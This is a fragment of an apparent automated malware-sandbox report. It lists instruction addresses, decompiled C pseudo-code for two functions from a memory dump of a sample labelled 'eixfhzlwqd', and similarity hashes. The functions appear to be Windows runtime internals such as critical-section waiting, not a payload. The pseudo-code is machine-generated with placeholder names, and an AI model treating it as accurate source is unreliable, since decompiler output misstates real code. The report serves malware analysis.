                                                              0x00a528d8
                                                              0x00a528db
                                                              0x00a95c26
                                                              0x00a95c28
                                                              0x00a95c2d
                                                              0x00a95c2d
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95c34
                                                              0x00a95c36
                                                              0x00a95c49
                                                              0x00a95c4e
                                                              0x00a95c54
                                                              0x00a95c5b
                                                              0x00a95c5d
                                                              0x00a95c60
                                                              0x00a52788
                                                              0x00a52788
                                                              0x00a5278b
                                                              0x00a5278e
                                                              0x00a5278e
                                                              0x00a5278e
                                                              0x00a52791
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52756
                                                              0x00a52750
                                                              0x00000000
                                                              0x00a52794
                                                              0x00a52794
                                                              0x00a52795
                                                              0x00a52798
                                                              0x00a52798
                                                              0x00000000
                                                              0x00a52734
                                                              0x00a5272c
                                                              0x00a52700
                                                              0x00a525ef
                                                              0x00a525ef
                                                              0x00a525ef
                                                              0x00a525f2
                                                              0x00a525f8
                                                              0x00000000
                                                              0x00000000
                                                              0x00a525fe
                                                              0x00000000
                                                              0x00a528e6
                                                              0x00a528ec
                                                              0x00a528ef
                                                              0x00a528f5
                                                              0x00a528f8
                                                              0x00a528f8
                                                              0x00000000
                                                              0x00a528f8
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52866
                                                              0x00a52866
                                                              0x00a52876
                                                              0x00a52879
                                                              0x00000000
                                                              0x00000000
                                                              0x00a527e0
                                                              0x00a527e7
                                                              0x00a527e9
                                                              0x00a527eb
                                                              0x00a95afd
                                                              0x00000000
                                                              0x00a95afd
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52633
                                                              0x00a52638
                                                              0x00a5263b
                                                              0x00a5263c
                                                              0x00a5263e
                                                              0x00a52640
                                                              0x00a52642
                                                              0x00a52647
                                                              0x00a52649
                                                              0x00a5264e
                                                              0x00a52650
                                                              0x00a52653
                                                              0x00a52659
                                                              0x00a526a2
                                                              0x00a526a7
                                                              0x00a526ac
                                                              0x00a526b2
                                                              0x00a95b11
                                                              0x00a95b15
                                                              0x00a95b17
                                                              0x00000000
                                                              0x00a526b8
                                                              0x00a526b8
                                                              0x00a526ba
                                                              0x00a527a6
                                                              0x00a527a6
                                                              0x00a527a9
                                                              0x00a527ab
                                                              0x00a527b9
                                                              0x00a527b9
                                                              0x00a527be
                                                              0x00a527c1
                                                              0x00a527c3
                                                              0x00a527c5
                                                              0x00a527c7
                                                              0x00a95c74
                                                              0x00a95c79
                                                              0x00a95c79
                                                              0x00a527c7
                                                              0x00000000
                                                              0x00a526c0
                                                              0x00a526c0
                                                              0x00a526c3
                                                              0x00a526c6
                                                              0x00a526c6
                                                              0x00a526c9
                                                              0x00a526c9
                                                              0x00000000
                                                              0x00a526c9
                                                              0x00a526ba
                                                              0x00a5265b
                                                              0x00a5265b
                                                              0x00a5265e
                                                              0x00a52667
                                                              0x00a5266d
                                                              0x00a52677
                                                              0x00a5267c
                                                              0x00a5267f
                                                              0x00a52681
                                                              0x00a95b49
                                                              0x00a95b4e
                                                              0x00a527cd
                                                              0x00a527d0
                                                              0x00a527d1
                                                              0x00a527d2
                                                              0x00a527d4
                                                              0x00a527dd
                                                              0x00a52687
                                                              0x00a52687
                                                              0x00a5268a
                                                              0x00a5268b
                                                              0x00a5268e
                                                              0x00a5268f
                                                              0x00a52691
                                                              0x00a52696
                                                              0x00a52698
                                                              0x00a5269d
                                                              0x00a5269f
                                                              0x00000000
                                                              0x00a5269f
                                                              0x00a52681
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52846
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52605
                                                              0x00a5260a
                                                              0x00a5260c
                                                              0x00a52611
                                                              0x00a52616
                                                              0x00a52619
                                                              0x00a52619
                                                              0x00a5261e
                                                              0x00000000
                                                              0x00a52624
                                                              0x00a52627
                                                              0x00a52627
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95b1f
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52894
                                                              0x00a5289b
                                                              0x00a5289d
                                                              0x00a528a1
                                                              0x00a95b2b
                                                              0x00a95b2e
                                                              0x00a95b2e
                                                              0x00a528a7
                                                              0x00a528a9
                                                              0x00a95b04
                                                              0x00a95b09
                                                              0x00a95b09
                                                              0x00a95b09
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95b35
                                                              0x00a95b3c
                                                              0x00a528fb
                                                              0x00a528fb
                                                              0x00a526cc
                                                              0x00a526cc
                                                              0x00a526d0
                                                              0x00000000
                                                              0x00a526d2
                                                              0x00a526d2
                                                              0x00000000
                                                              0x00a526d2
                                                              0x00000000
                                                              0x00000000
                                                              0x00a525fe
                                                              0x00a5292d
                                                              0x00a5292f
                                                              0x00a52930
                                                              0x00a52935
                                                              0x00a52937
                                                              0x00a52938
                                                              0x00a5293b
                                                              0x00a5293c
                                                              0x00a5293e
                                                              0x00a5293f
                                                              0x00a52940
                                                              0x00a52942
                                                              0x00a52944
                                                              0x00a52947
                                                              0x00a52948
                                                              0x00a5294e
                                                              0x00a5294f
                                                              0x00a52954
                                                              0x00a5295a
                                                              0x00a52962
                                                              0x00a52963
                                                              0x00a52964
                                                              0x00a52966
                                                              0x00a5296c
                                                              0x00a5296f
                                                              0x00a52970
                                                              0x00a52972
                                                              0x00a52973
                                                              0x00a52978
                                                              0x00a5297b
                                                              0x00a52980
                                                              0x00a52981
                                                              0x00a52982
                                                              0x00a52983
                                                              0x00a52984
                                                              0x00a52985
                                                              0x00a52986
                                                              0x00a52987
                                                              0x00a52988
                                                              0x00a52989
                                                              0x00a5298a
                                                              0x00a5298b
                                                              0x00a5298c
                                                              0x00a5298d
                                                              0x00a5298e
                                                              0x00a5298f
                                                              0x00a52990
                                                              0x00a52992
                                                              0x00a52997
                                                              0x00a529a3
                                                              0x00a529a6
                                                              0x00a529ab
                                                              0x00a529ad
                                                              0x00a529b0
                                                              0x00a529b2
                                                              0x00a95c80
                                                              0x00a529b8
                                                              0x00a529b8
                                                              0x00a529bb
                                                              0x00a529c0
                                                              0x00a529c5
                                                              0x00a529c6
                                                              0x00a529c6
                                                              0x00a529c9
                                                              0x00a529cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00a529cd
                                                              0x00a529d0
                                                              0x00a529d9
                                                              0x00a529db
                                                              0x00a529dd
                                                              0x00a52a7f
                                                              0x00a52a84
                                                              0x00a52a87
                                                              0x00a52a89
                                                              0x00a95ca1
                                                              0x00a95ca3
                                                              0x00000000
                                                              0x00a52a8f
                                                              0x00a52a8f
                                                              0x00000000
                                                              0x00a52a8f
                                                              0x00000000
                                                              0x00a529e3
                                                              0x00a529e3
                                                              0x00a529e3
                                                              0x00000000
                                                              0x00a529e3
                                                              0x00a529dd
                                                              0x00000000
                                                              0x00a529db
                                                              0x00a529e6
                                                              0x00a529e9
                                                              0x00a529eb
                                                              0x00a529ed
                                                              0x00a529f3
                                                              0x00a529f5
                                                              0x00a529f8
                                                              0x00a529fa
                                                              0x00a52a97
                                                              0x00a52a9a
                                                              0x00a52a9d
                                                              0x00a52add
                                                              0x00000000
                                                              0x00a52a9f
                                                              0x00a52aa2
                                                              0x00a52aa5
                                                              0x00a52aa8
                                                              0x00a52aab
                                                              0x00a95cab
                                                              0x00a95caf
                                                              0x00a95cc5
                                                              0x00a95cda
                                                              0x00a95cdc
                                                              0x00a95cdf
                                                              0x00a95ce5
                                                              0x00000000
                                                              0x00a95ceb
                                                              0x00a95ced
                                                              0x00a95cee
                                                              0x00000000
                                                              0x00a95cee
                                                              0x00a95cb1
                                                              0x00a95cb4
                                                              0x00a95cb9
                                                              0x00a95cbb
                                                              0x00000000
                                                              0x00a95cbd
                                                              0x00a95cbd
                                                              0x00000000
                                                              0x00a95cbd
                                                              0x00a95cbb
                                                              0x00a52ab1
                                                              0x00a52ab1
                                                              0x00a52ac4
                                                              0x00a52ac6
                                                              0x00a52ac6
                                                              0x00000000
                                                              0x00a52ac6
                                                              0x00a52aab
                                                              0x00000000
                                                              0x00a52a00
                                                              0x00a52a09
                                                              0x00a52a0e
                                                              0x00a52a21
                                                              0x00a52a24
                                                              0x00a52a35
                                                              0x00a52a3a
                                                              0x00a52a3d
                                                              0x00a52a42
                                                              0x00a52a59
                                                              0x00a52a59
                                                              0x00a52a5c
                                                              0x00a52a5f
                                                              0x00a52a5f
                                                              0x00a529fa
                                                              0x00a529f3
                                                              0x00a52a64
                                                              0x00a52a64
                                                              0x00a52a6b
                                                              0x00a52a6b
                                                              0x00a52a6d
                                                              0x00a52a72
                                                              0x00a52a72
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PATH
                                                              • API String ID: 0-1036084923
                                                              • Opcode ID: 63325eef7adb3e370f6d4ffc5a85edfe54123222f24c97c82a4e9c38d21503c2
                                                              • Instruction ID: 0493abc32620953ad82a8f1e2db508923213af0faca4fff0588d30787adda36a
                                                              • Opcode Fuzzy Hash: 63325eef7adb3e370f6d4ffc5a85edfe54123222f24c97c82a4e9c38d21503c2
                                                              • Instruction Fuzzy Hash: 18C16DB5E00219EFCB25DFA8D981BAEB7B5FF49701F544029E801BB351EB34A945CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A22D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 63%
                                                              			E00A22D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xb15350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xb17bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00A697C0();
				}
				if( *0xb179c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xb179c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00A51624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00A47D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00ABFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00A69520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00A5E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00A7DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xb16901;
								_push(_t109);
								_v52 = _t98;
								if( *0xb16901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00A69980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00A695D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00A47D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00A47D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00AA7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00ABFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xb15350;
							if(_t109 != 0xb15350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00ABFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00AB5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                              0x00a22d8a
                                                              0x00a22d8a
                                                              0x00a22d92
                                                              0x00a22d96
                                                              0x00a22d9e
                                                              0x00a22da0
                                                              0x00a22da3
                                                              0x00a22da5
                                                              0x00a22da8
                                                              0x00a22dab
                                                              0x00a22db2
                                                              0x00a7f9aa
                                                              0x00a7f9ab
                                                              0x00a7f9ae
                                                              0x00a7f9ae
                                                              0x00a22db8
                                                              0x00a22dc2
                                                              0x00a7f9b9
                                                              0x00a7f9be
                                                              0x00a7f9bf
                                                              0x00a7f9bf
                                                              0x00a22dcf
                                                              0x00a7f9c9
                                                              0x00a22dd5
                                                              0x00a22dd5
                                                              0x00a22dd5
                                                              0x00a22dde
                                                              0x00a22de1
                                                              0x00a22e70
                                                              0x00a22e72
                                                              0x00a22e72
                                                              0x00a22de7
                                                              0x00a22deb
                                                              0x00a22e7c
                                                              0x00a22e83
                                                              0x00a22e85
                                                              0x00a22e8b
                                                              0x00a22e8d
                                                              0x00a22e92
                                                              0x00a22e92
                                                              0x00a22e85
                                                              0x00a22df1
                                                              0x00a22df7
                                                              0x00a22df9
                                                              0x00a22df9
                                                              0x00a22dfc
                                                              0x00a22dff
                                                              0x00a22e02
                                                              0x00000000
                                                              0x00a22e05
                                                              0x00a22e0c
                                                              0x00a7f9d9
                                                              0x00a22e12
                                                              0x00a22e12
                                                              0x00a22e12
                                                              0x00a22e1a
                                                              0x00a7f9e3
                                                              0x00a7f9e9
                                                              0x00a7f9f0
                                                              0x00a7f9f6
                                                              0x00a7f9f8
                                                              0x00a7f9f8
                                                              0x00a7f9f0
                                                              0x00a22e23
                                                              0x00a7fa02
                                                              0x00a7fa03
                                                              0x00a7fa05
                                                              0x00a7fa06
                                                              0x00000000
                                                              0x00a22e29
                                                              0x00a22e29
                                                              0x00a22e2e
                                                              0x00a22e34
                                                              0x00a22e3e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a22e44
                                                              0x00a22e47
                                                              0x00a22e4d
                                                              0x00000000
                                                              0x00000000
                                                              0x00a22e4f
                                                              0x00a22e54
                                                              0x00000000
                                                              0x00000000
                                                              0x00a22e5a
                                                              0x00a22e5f
                                                              0x00a22e9a
                                                              0x00a22ea4
                                                              0x00a22ea5
                                                              0x00a22ea8
                                                              0x00a22eaf
                                                              0x00a22eb2
                                                              0x00a22eb5
                                                              0x00a7fae9
                                                              0x00a7faeb
                                                              0x00a7faed
                                                              0x00a7faef
                                                              0x00a7faf7
                                                              0x00a7faf8
                                                              0x00a7fafd
                                                              0x00a7faff
                                                              0x00a7fb04
                                                              0x00a7fb04
                                                              0x00a7faff
                                                              0x00a22ec0
                                                              0x00a22ec4
                                                              0x00a22ec6
                                                              0x00a22ec8
                                                              0x00a7fb14
                                                              0x00a7fb18
                                                              0x00a7fb1e
                                                              0x00a7fb21
                                                              0x00a7fb21
                                                              0x00a22ece
                                                              0x00a22ece
                                                              0x00a22ece
                                                              0x00a22ed7
                                                              0x00a22e61
                                                              0x00a22e63
                                                              0x00a7fa6b
                                                              0x00a7fa71
                                                              0x00a7fa76
                                                              0x00a7fa78
                                                              0x00a7fa8a
                                                              0x00a7fa7a
                                                              0x00a7fa83
                                                              0x00a7fa83
                                                              0x00a7fa8f
                                                              0x00a7fa91
                                                              0x00a7fa97
                                                              0x00a7fa9d
                                                              0x00a7faa4
                                                              0x00a7faaa
                                                              0x00a7faaf
                                                              0x00a7fab1
                                                              0x00a7fac3
                                                              0x00a7fab3
                                                              0x00a7fabc
                                                              0x00a7fabc
                                                              0x00a7fac8
                                                              0x00a7facb
                                                              0x00a7fadf
                                                              0x00a7fadf
                                                              0x00a7facb
                                                              0x00a7faa4
                                                              0x00a7fa91
                                                              0x00a22e6f
                                                              0x00a22e6f
                                                              0x00a22e5f
                                                              0x00a7fa13
                                                              0x00a7fa15
                                                              0x00a7fa17
                                                              0x00a7fa1f
                                                              0x00a7fa21
                                                              0x00a7fa22
                                                              0x00a7fa25
                                                              0x00a7fa28
                                                              0x00a7fa2f
                                                              0x00a7fa2f
                                                              0x00a7fa2a
                                                              0x00a7fa2a
                                                              0x00a7fa2a
                                                              0x00a7fa31
                                                              0x00a7fa34
                                                              0x00a7fa36
                                                              0x00a7fa3c
                                                              0x00a7fa3e
                                                              0x00a7fa41
                                                              0x00a7fa43
                                                              0x00a7fa45
                                                              0x00a7fa45
                                                              0x00a7fa41
                                                              0x00a7fa3c
                                                              0x00a7fa4a
                                                              0x00a7fa4f
                                                              0x00a7fa51
                                                              0x00a7fa53
                                                              0x00a7fa56
                                                              0x00a7fa5b
                                                              0x00a7fa5e
                                                              0x00000000
                                                              0x00a7fa5e
                                                              0x00a22e23

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Re-Waiting
                                                              • API String ID: 0-316354757
                                                              • Opcode ID: f57a64d9222f100743d63d5a587d69071dee42c5f197651d9ebd5220f6cbbb0e
                                                              • Instruction ID: 573c43c865e1e6840763ebb3db4174702bbda2b02914ecc6e3367c34536fff6a
                                                              • Opcode Fuzzy Hash: f57a64d9222f100743d63d5a587d69071dee42c5f197651d9ebd5220f6cbbb0e
                                                              • Instruction Fuzzy Hash: 89612031A00654AFDB31DB6CDD40BBEBBB5EB44360F2586B9E819A72D1CB349E40D781
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A252A5 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E00A252A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00A3EEF0(0xb179a0);
					_t104 =  *0xb18210; // 0x4d2c68
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E00A3EB70(_t93, 0xb179a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E00A69890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00A3EEF0(0xb179a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00A3EB70(0, 0xb179a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x4d2c75
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00A5F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00A3EEF0(0xb179a0);
									__eflags =  *0xb18210 - _t104; // 0x4d2c68
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0xb18210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00AA4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E00A3EB70(_t95, 0xb179a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00A695D0();
											L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00A695D0();
											L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00A3EB70(_t93, 0xb179a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E00A695D0();
										L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00A695D0();
										L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00A5F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                              0x00a252a5
                                                              0x00a252ad
                                                              0x00a252b0
                                                              0x00a252b3
                                                              0x00a252b7
                                                              0x00a252ba
                                                              0x00a252bf
                                                              0x00a252c4
                                                              0x00a252cc
                                                              0x00000000
                                                              0x00000000
                                                              0x00a252ce
                                                              0x00a252d9
                                                              0x00a252dd
                                                              0x00a252e7
                                                              0x00a252f7
                                                              0x00a252f9
                                                              0x00a252fd
                                                              0x00a80dcf
                                                              0x00a80dd5
                                                              0x00a80dd6
                                                              0x00a80dd7
                                                              0x00a80dd8
                                                              0x00a80dd9
                                                              0x00a80dde
                                                              0x00a80ddf
                                                              0x00a80de0
                                                              0x00a80de1
                                                              0x00a80de2
                                                              0x00a80de5
                                                              0x00a80dea
                                                              0x00a80dec
                                                              0x00a80f60
                                                              0x00a80f64
                                                              0x00a80f70
                                                              0x00a80f76
                                                              0x00a80f79
                                                              0x00a80f79
                                                              0x00000000
                                                              0x00a80f64
                                                              0x00a80df2
                                                              0x00a80df7
                                                              0x00a80e04
                                                              0x00a80e0d
                                                              0x00a80e0d
                                                              0x00a80e10
                                                              0x00a80e1a
                                                              0x00a80e1c
                                                              0x00a80e4c
                                                              0x00a80e52
                                                              0x00a80e61
                                                              0x00a80e67
                                                              0x00a80e6b
                                                              0x00a80e70
                                                              0x00a80e76
                                                              0x00a80ed7
                                                              0x00a80edc
                                                              0x00a80ee0
                                                              0x00a80ee6
                                                              0x00a80eea
                                                              0x00a80eed
                                                              0x00a80ef0
                                                              0x00a80ef3
                                                              0x00a80ef6
                                                              0x00a80ef9
                                                              0x00a80efe
                                                              0x00a80f01
                                                              0x00a80f01
                                                              0x00a80f0b
                                                              0x00a80f12
                                                              0x00a80f16
                                                              0x00a80f18
                                                              0x00a80f1b
                                                              0x00a80f2c
                                                              0x00a80f31
                                                              0x00a80f31
                                                              0x00a80f35
                                                              0x00a80f39
                                                              0x00a80f3a
                                                              0x00a80f3c
                                                              0x00a80f3f
                                                              0x00a80f50
                                                              0x00a80f55
                                                              0x00a80f55
                                                              0x00a80f59
                                                              0x00a252eb
                                                              0x00a252f1
                                                              0x00a252f1
                                                              0x00a80e7d
                                                              0x00a80e84
                                                              0x00a80e88
                                                              0x00a80e8a
                                                              0x00a80e8d
                                                              0x00a80e9e
                                                              0x00a80ea3
                                                              0x00a80ea3
                                                              0x00a80ea7
                                                              0x00a80eaf
                                                              0x00a80eb3
                                                              0x00a80eb9
                                                              0x00a80eb9
                                                              0x00a80ebc
                                                              0x00a80ecd
                                                              0x00a80ecd
                                                              0x00000000
                                                              0x00a80eb3
                                                              0x00a80e21
                                                              0x00a80e2b
                                                              0x00a80e2f
                                                              0x00a80e30
                                                              0x00a80e3a
                                                              0x00a80e3f
                                                              0x00a80e41
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80e47
                                                              0x00000000
                                                              0x00a80e47
                                                              0x00a80df9
                                                              0x00a80dfe
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a80dfe
                                                              0x00a25303
                                                              0x00a25307
                                                              0x00000000
                                                              0x00a25309
                                                              0x00000000
                                                              0x00a25309
                                                              0x00a25307
                                                              0x00a252e9
                                                              0x00a252e9
                                                              0x00000000
                                                              0x00a252e9
                                                              0x00a2530e
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h,M
                                                              • API String ID: 0-2295928073
                                                              • Opcode ID: 631a88f256d21d3341e42f989e070962b6ccb3ab4e473ddd863320646aa15889
                                                              • Instruction ID: e2fdf24154ceb3f12dbfab28f0242c3b1873a0ed5ea0b28e797c8ca90f66ce54
                                                              • Opcode Fuzzy Hash: 631a88f256d21d3341e42f989e070962b6ccb3ab4e473ddd863320646aa15889
